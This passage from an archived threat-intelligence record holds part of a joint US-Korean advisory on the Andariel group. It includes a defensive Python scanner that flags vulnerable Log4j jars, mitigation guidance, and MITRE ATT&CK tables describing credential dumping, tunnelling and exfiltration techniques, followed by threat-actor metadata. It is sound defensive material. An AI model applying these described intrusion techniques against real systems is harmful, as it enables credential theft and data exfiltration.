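    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def classify(version: Optional[Version], jndi_present: bool) -> str:
    """Status labels are this example's own; thresholds follow the advisory (fixed in 2.15.0, target 2.17.0)."""
    if version is None or version[0] != 2:
        return "not-log4j2"          # Log4j 1.x is not affected by CVE-2021-44228
    if version < (2, 15, 0) and jndi_present:
        return "vulnerable-log4shell"
    if version < (2, 17, 0):
        return "update-required"     # JndiLookup removed, or 2.15/2.16 with the follow-on CVEs
    return "ok"


def scan_archive(data: bytes, label: str, findings: List[Finding]) -> None:
    """Record any log4j-core found in this archive, then recurse into nested jars/wars."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    names = zf.namelist()
    if POM_PROPS in names:
        version = parse_version(zf.read(POM_PROPS).decode("utf-8", "replace"))
        jndi = JNDI_CLASS in names
        ver_str = ".".join(map(str, version)) if version else "unknown"
        findings.append((label, ver_str, jndi, classify(version, jndi)))
    for name in names:
        if name.lower().endswith(NESTED_SUFFIXES):
            scan_archive(zf.read(name), f"{label}!{name}", findings)


def scan_bytes(data: bytes, label: str = "archive") -> List[Finding]:
    findings: List[Finding] = []
    scan_archive(data, label, findings)
    return findings


def scan_file(path: str) -> List[Finding]:
    with open(path, "rb") as f:
        return scan_bytes(f.read(), path)


# --- constructed sample input (stand-ins, not real log4j builds) -------------

def build_log4j_core(version: str, keep_jndi: bool = True) -> bytes:
    """Minimal stand-in for a log4j-core jar: only the two entries the scanner inspects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if keep_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not a real class file
    return buf.getvalue()


def build_sample_war() -> bytes:
    """A WAR nesting three log4j-core jars: vulnerable, class-deleted, and upgraded."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", build_log4j_core("2.14.1"))
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1-nojndi.jar", build_log4j_core("2.14.1", keep_jndi=False))
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", build_log4j_core("2.17.1"))
    return buf.getvalue()


if __name__ == "__main__":
    for path, ver, jndi, status in scan_bytes(build_sample_war(), "sample.war"):
        print(f"{status:22} {ver:8} jndi={str(jndi):5} {path}")
```

Shaded or relocated builds may not carry pom.properties at that path, so treat an empty result as "not found" rather than "not vulnerable" and pair this with a class-name or hash search. The JndiLookup check is what distinguishes a jar that was mitigated by deleting the class from one that was never touched; both still need the upgrade, but only the latter is exploitable through the lookup.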
\r\nNote: CVE-2021-44228 (‘Log4Shell’) was disclosed in December 2021 and affects Apache Log4j 2 versions 2.0-beta9 through 2.14.1. It was patched in 2.15.0, and the follow-on Log4j CVEs disclosed the same month were fixed in 2.16.0 and 2.17.0, which is why anything older than 2.17.0 should be treated as affected.\r\nDefenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to detect possible Log4Shell exploitation.\r\nWeb Shell Malware\r\nWeb shell malware is deployed by adversaries on a victim’s web server to execute arbitrary system commands. The NSA and Australian Signals Directorate’s report titled “Detect and Prevent Web Shell Malware” provides mitigating actions to identify and recover from web shells.\r\nPreventing exploitation of web-facing servers often depends on maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs).\r\nEndpoint Activity\r\nPreventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring mechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and services or turning them off entirely, and segmenting the network to prevent lateral movement from a compromised web server to critical assets.\r\nCommand Line Activity and Remote Access\r\nMonitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets can protect against malicious activity by RGB 3rd Bureau’s Andariel group and other cyber threat actors.\r\nPacking\r\nSignatures for Themida, VMProtect and a number of other packers are available in the ditekshen indicator_packed.yar ruleset listed in the References (the INDICATOR_EXE_Packed_VMProtect and INDICATOR_EXE_Packed_Themida rules above come from it). The signatures will not identify every file packed using these applications, because they key on the packers’ default section names and strings, which are not present in every build.\r\nAdditional Mitigation Measures for Malicious 
Activities\r\nCheck for security vulnerabilities, apply patches, and update to the latest version of software\r\nEncrypt all sensitive data including personal information\r\nBlock access to unused ports\r\nChange passwords when they are suspected of being compromised\r\nAlert on unexpected use of dual-use applications\r\nStrengthen the subscriber identity authentication process for leased servers\r\nDPRK Rewards for Justice\r\nThe U.S. and ROK Governments encourage victims to report suspicious activities, including those related to suspected DPRK cyber activities, to relevant authorities. If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing it through the Department of State’s Rewards for Justice program could make you eligible for a reward of up to $10 million. For further details, please visit https://rewardsforjustice.net/.\r\nAcknowledgements\r\nMandiant and Microsoft Threat Intelligence contributed to this CSA.\r\nDisclaimer of Endorsement\r\nYour organization has no obligation to respond or provide information in response to this product. If, after reviewing the information provided, your organization decides to provide information to the authoring agencies, it must do so consistent with applicable state and federal law.\r\nThe information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial product or service, including any subjects of analysis. 
Any reference to specific commercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the co-authors.\r\nVersion History\r\nJuly 25, 2024: Initial version.\r\nAugust 6, 2024: Updated “Credential Access” and “Commodity Malware and Dual-Use Applications” sections.\r\nTrademark Recognition\r\nActive Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT\u0026CK® are registered trademarks of The MITRE Corporation.\r\nPurpose\r\nThis document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.\r\nContact\r\nU.S. 
organizations: Urgently report any anomalous activity or incidents, including based upon technical\r\ninformation associated with this Cybersecurity Advisory, to CISA at Contact@mail.cisa.dhs.gov or\r\ncisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices.\r\nDC3 Cyber Forensics Laboratory (CFL): afosi.dc3.cflintake@us.af.mil\r\nDoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment\r\n(DCISE): dc3.dcise@us.af.mil\r\nNSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov\r\nNSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov\r\nNSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov\r\nRepublic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or\r\ndiscover similar cases, please contact the relevant authorities below.\r\nNational Intelligence Service: www.nis.go.kr , +82 111\r\nReferences\r\nAhnLab Security Emergency Response Center:\r\nhttps://asec.ahnlab.com/en/56405/\r\nhttps://asec.ahnlab.com/en/59073/\r\nhttps://asec.ahnlab.com/en/66088/\r\nBoredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps-linux-backdoor-notes.html\r\nCisco Talos Intelligence blogs:\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nhttps://blog.talosintelligence.com/lazarus-magicrat/\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nDCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-\r\ndbfe29f57499\r\nGithub.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 27 of 31\n\nJPCERT blogs:\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nMandiant 
blogs:\r\nhttps://www.mandiant.com/resources/blog/north-korea-cyber-structure-alignment-2023\r\nhttps://www.mandiant.com/resources/blog/mapping-dprk-groups-to-government\r\nMicrosoft blogs:\r\nhttps://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\r\nhttps://www.microsoft.com/en-us/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/\r\nNSCS Guidance:\r\nAlert: Apache Log4j Vulnerabilities: https://www.ncsc.gov.uk/news/apache-log4j-vulnerability\r\nInformation: https://www.ncsc.gov.uk/information/log4j-vulnerability-what-everyone-needs-to-know\r\nSymantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research\r\nVMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html\r\nWithSecure Labs report: https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector\r\nAppendix: MITRE ATT\u0026CK Techniques and Software\r\nThe tactics and techniques referenced in this advisory are identified in Table 3 – Table 12.\r\nTable 3. Reconnaissance and Enumeration\r\nTechnique Title ID Use\r\nGather Victim Org\r\nInformation\r\nT1591 The actors gather information about the victim’s organization that can\r\nbe used during targeting.\r\nGather Victim Host\r\nInformation\r\nT1592 The actors gather information about the victim’s hosts that can be used\r\nduring targeting.\r\nActive Scanning\r\nT1595 The actors execute active reconnaissance scans to gather information\r\nthat can be used during targeting.\r\nSearch Open Technical\r\nDatabases\r\nT1596 The actors search freely available technical databases for information\r\nabout victims that can be used during targeting.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 28 of 31\n\nTable 4. 
Resource Development, Tooling, and Remote Access Tools (RATs)\r\nTechnique Title ID Use\r\nOS Credential\r\nDumping\r\nT1003\r\nThe actors attempt to dump credentials to obtain account login and\r\ncredential material, normally in the form of a hash or a clear text\r\npassword, from the operating system and software.\r\nExfiltration Over\r\nAlternative\r\nProtocol\r\nT1048\r\nThe actors steal data by exfiltrating it over a different protocol than that\r\nof the existing command and control channel.\r\nProxy T1090\r\nThe actors use a connection proxy to direct network traffic between\r\nsystems or act as intermediary for network communications to a\r\ncommand and control server to avoid direct connections to their\r\ninfrastructure.\r\nArchive Collected\r\nData\r\nT1560\r\nThe actors compress and/or encrypt data that is collected prior to\r\nexfiltration.\r\nProtocol Tunneling T1572\r\nThe actors tunnel network communications to and from a victim system\r\nwithin a separate protocol to avoid detection/network filtering and/or\r\nenable access to otherwise unreachable systems.\r\nDevelop\r\nCapabilities:\r\nMalware\r\nT1587.001 The actors develop malware and malware components that can be used\r\nduring targeting.\r\nDevelop\r\nCapabilities:\r\nExploits\r\nT1587.004\r\nThe actors develop exploits that can be used during targeting.\r\nTable 5. Software used for Resource Development, Tooling, and RATs\r\nSoftware\r\nTitle\r\nID Use\r\nMimikatz\r\nS0002\r\nThe actors use a credential dumper capable of obtaining plaintext Windows account\r\nlogins and passwords, along with many other features that make it useful for testing\r\nthe security of networks.\r\nAdFind\r\nS0552 The actors use a free command-line query tool that can be used for gathering\r\ninformation from the Active Directory.\r\nTable 6. 
Initial Access\r\nTechnique Title ID Use\r\nExploit Public-Facing\r\nApplication\r\nT1190 The actors attempt to exploit a weakness in an Internet-facing host or\r\nsystem to initially access a network.\r\nTable 7. Execution\r\nTechnique Title ID Use\r\nCommand and Scripting\r\nInterpreter\r\nT1059 The actors abuse command and script interpreters to execute\r\ncommands, scripts, or binaries.\r\nTable 8. Defense Evasion\r\nTechnique Title ID Use\r\nObfuscated Files or\r\nInformation\r\nT1027\r\nThe actors attempt to make an executable or file difficult to discover or\r\nanalyze by encrypting, encoding, or otherwise obfuscating its content on\r\nthe system or in transit.\r\nTable 9. Credential Access\r\nTechnique\r\nTitle\r\nID Use\r\nOS Credential\r\nDumping\r\nT1003\r\nThe actors attempt to dump credentials to obtain account login and credential\r\nmaterial, normally in the form of a hash or a clear text password, from the\r\noperating system and software.\r\nTable 10. Discovery and Lateral Movement\r\nTechnique Title ID Use\r\nRemote Services T1021\r\nThe actors use valid accounts to log into a service that accepts\r\nremote connections, such as telnet, SSH, and VNC.\r\nRemote Services:\r\nSMB/Windows Admin\r\nShares\r\nT1021.002 The actors use valid accounts to interact with a remote network\r\nshare using Server Message Block (SMB).\r\nFile and Directory\r\nDiscovery\r\nT1083\r\nThe actors enumerate files and directories or may search in\r\nspecific locations of a host or network share for certain\r\ninformation within a file system.\r\nAccount Discovery T1087\r\nThe actors attempt to get a listing of valid accounts, usernames,\r\nor email addresses on a system or within a compromised\r\nenvironment.\r\nTable 11. 
Command and Control\r\nTechnique Title ID Use\r\nApplication Layer\r\nProtocol\r\nT1071\r\nThe actors establish command and control capabilities over commonly used\r\napplication layer protocols such as HTTP(S), OPC, telnet, DNP3, and\r\nModbus.\r\nProxy\r\nT1090 The actors use a connection proxy to direct network traffic between systems\r\nor act as an intermediary for network communications.\r\nTable 12. Collection and Exfiltration\r\nTechnique Title ID Use\r\nData from Network\r\nShared Drive\r\nT1039 The actors search network shares on computers they have\r\ncompromised to find files of interest.\r\nExfiltration Over\r\nAlternative Protocol\r\nT1048 The actors steal data by exfiltrating it over a different protocol than\r\nthat of the existing command and control server.\r\nArchive Collected Data\r\nT1560 The actors compress and/or encrypt data that is collected prior to\r\nexfiltration.\r\nExfiltration Over Web\r\nService\r\nT1567 The actors use an existing, legitimate external Web service to exfiltrate\r\ndata rather than their primary command and control channel.\r\nSource: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
	],
	"report_names": [
		"aa24-207a"
	],
	"threat_actors": [
		{
			"id": "838f6ced-12a4-4893-991a-36d231d96efd",
			"created_at": "2022-10-25T15:50:23.347455Z",
			"updated_at": "2026-04-10T02:00:05.295717Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"Andariel",
				"Silent Chollima",
				"PLUTONIUM",
				"Onyx Sleet"
			],
			"source_name": "MITRE:Andariel",
			"tools": [
				"Rifdoor",
				"gh0st RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "110e7160-a8cc-4a66-8550-f19f7d418117",
			"created_at": "2023-01-06T13:46:38.427592Z",
			"updated_at": "2026-04-10T02:00:02.969896Z",
			"deleted_at": null,
			"main_name": "Silent Chollima",
			"aliases": [
				"Onyx Sleet",
				"PLUTONIUM",
				"OperationTroy",
				"Guardian of Peace",
				"GOP",
				"WHOis Team",
				"Andariel",
				"Subgroup: Andariel"
			],
			"source_name": "MISPGALAXY:Silent Chollima",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "40ec2da8-7156-4bff-b878-41984eb70df4",
			"created_at": "2024-02-02T02:00:04.080917Z",
			"updated_at": "2026-04-10T02:00:03.555365Z",
			"deleted_at": null,
			"main_name": "Storm-0530",
			"aliases": [
				"DEV-0530",
				"H0lyGh0st"
			],
			"source_name": "MISPGALAXY:Storm-0530",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "68cc6e37-f16d-4995-a75b-5e8e2a6cbb3d",
			"created_at": "2024-05-01T02:03:07.943593Z",
			"updated_at": "2026-04-10T02:00:03.795229Z",
			"deleted_at": null,
			"main_name": "BRONZE EDISON",
			"aliases": [
				"APT4 ",
				"DarkSeoul",
				"Maverick Panda ",
				"Salmon Typhoon ",
				"Sodium ",
				"Sykipot ",
				"TG-0623 ",
				"getkys"
			],
			"source_name": "Secureworks:BRONZE EDISON",
			"tools": [
				"Gh0st RAT",
				"Wkysol",
				"ZxPortMap"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bc6e3644-3249-44f3-a277-354b7966dd1b",
			"created_at": "2022-10-25T16:07:23.760559Z",
			"updated_at": "2026-04-10T02:00:04.741239Z",
			"deleted_at": null,
			"main_name": "Andariel",
			"aliases": [
				"APT 45",
				"Andariel",
				"G0138",
				"Jumpy Pisces",
				"Onyx Sleet",
				"Operation BLACKMINE",
				"Operation BLACKSHEEP/Phase 3.",
				"Operation Blacksmith",
				"Operation DESERTWOLF/Phase 3",
				"Operation GHOSTRAT",
				"Operation GoldenAxe",
				"Operation INITROY/Phase 1",
				"Operation INITROY/Phase 2",
				"Operation Mayday",
				"Operation VANXATM",
				"Operation XEDA",
				"Plutonium",
				"Silent Chollima",
				"Stonefly"
			],
			"source_name": "ETDA:Andariel",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "771d9263-076e-4b6e-bd58-92b6555eb739",
			"created_at": "2025-08-07T02:03:25.092436Z",
			"updated_at": "2026-04-10T02:00:03.758541Z",
			"deleted_at": null,
			"main_name": "NICKEL HYATT",
			"aliases": [
				"APT45 ",
				"Andariel",
				"Dark Seoul",
				"Jumpy Pisces ",
				"Onyx Sleet ",
				"RIFLE Campaign",
				"Silent Chollima ",
				"Stonefly ",
				"UN614 "
			],
			"source_name": "Secureworks:NICKEL HYATT",
			"tools": [
				"ActiveX 0-day",
				"DTrack",
				"HazyLoad",
				"HotCriossant",
				"Rifle",
				"UnitBot",
				"Valefor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434889,
	"ts_updated_at": 1775826694,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/efa6aec67591c9eadc36060479de75e1d3c90321.pdf",
		"text": "https://archive.orkl.eu/efa6aec67591c9eadc36060479de75e1d3c90321.txt",
		"img": "https://archive.orkl.eu/efa6aec67591c9eadc36060479de75e1d3c90321.jpg"
	}
}